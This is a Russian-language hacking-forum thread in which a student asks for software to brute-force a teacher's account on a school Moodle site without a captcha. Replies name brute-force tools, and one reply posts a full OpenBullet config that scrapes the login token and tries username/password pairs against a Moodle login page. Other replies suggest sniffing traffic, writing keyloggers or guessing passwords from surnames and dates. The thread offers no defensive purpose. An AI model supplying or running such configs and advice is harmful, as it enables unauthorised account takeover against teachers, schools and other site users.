Артемий Закамянелый
New member
- 10.02.2020
- 2
- 0
Достала эта математичка, хз откуда берет свои тесты. А на этом *сайте* никакой капчи нифига, хоть целое столетие пробуй заходить с одним логином.
-
Новый бот-ассистент на форуме Codeby
Теперь на форуме работает ИИ-помощник @bot_cdb — твой технический ассистент по информационной безопасности. Просто упомяни @bot_cdb в любой теме, и получишь быстрый ответ на вопросы по CVE, инструментам, техникам атак и защиты. Бот анализирует весь тред перед ответом, проверяет актуальность данных и может предложить дополнительную помощь. Особенно полезен для проверки технических деталей, поиска документации и быстрых консультаций по пентесту, малвари, форензике и другим областям ИБ.
Подскажите софтину для брута учетки на сайте на Moodle.
- Автор темы Артемий Закамянелый
- Дата начала
-
- Теги
- brute force moodle
but43r
Green Team
- 23.12.2019
- 19
- 2
1. BurpSuite (Intruder)
2. Patator (модуль - http_fuzz)
3. Wfuzz
4. Ffuf
Последнее редактирование:
yky
Green Team
- 31.12.2019
- 100
- 41
Скачиваешь OpenBullet вставляешь конфиг:
Прокси по желанию можно взять
P.S. Конфиг пишется минут пять на любой сайт )
P.P.S. В конфиге убери * в URL
REQUEST GET "https*://moodle.org/*login/index.php"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
PARSE "<SOURCE>" LR "logintoken\" value=\"" "\">" -> VAR "token"
REQUEST POST "https*://moodle.org/*login/index.php"
CONTENT "anchor=&logintoken=<token>&username=<USERNAME>&password=<PASSWORD>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
KEYCHECK
KEYCHAIN Success OR
KEY "Выход"
KEYCHAIN Failure OR
KEY "Invalid login, please try again"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
PARSE "<SOURCE>" LR "logintoken\" value=\"" "\">" -> VAR "token"
REQUEST POST "https*://moodle.org/*login/index.php"
CONTENT "anchor=&logintoken=<token>&username=<USERNAME>&password=<PASSWORD>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
KEYCHECK
KEYCHAIN Success OR
KEY "Выход"
KEYCHAIN Failure OR
KEY "Invalid login, please try again"
Прокси по желанию можно взять
Ссылка скрыта от гостей
или
Ссылка скрыта от гостей
P.S. Конфиг пишется минут пять на любой сайт )
P.P.S. В конфиге убери * в URL
Последнее редактирование:
Кудрявый
Green Team
- 06.03.2017
- 14
- 19
Проще снифать трафик или кейлогеры делать.
Хотя по опыту скажу, что хорошие пороли только админ и сетевик ставили, все остальные значимые пароли. Фамилии, дата, девичия фамилия и etc.
Брут можно хоть на javascripte написать в violantmonkey. Там один запрос и прокси.
Хотя по опыту скажу, что хорошие пороли только админ и сетевик ставили, все остальные значимые пароли. Фамилии, дата, девичия фамилия и etc.
Брут можно хоть на javascripte написать в violantmonkey. Там один запрос и прокси.
Щербак Щербак
New member
- 27.06.2022
- 1
- 0
Так , а для тупых можно такойже но с уже извесным логином и просто подбор паролей?
Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab
Похожие темы
- Статья
Hacker Lab
Категории
Наши курсы
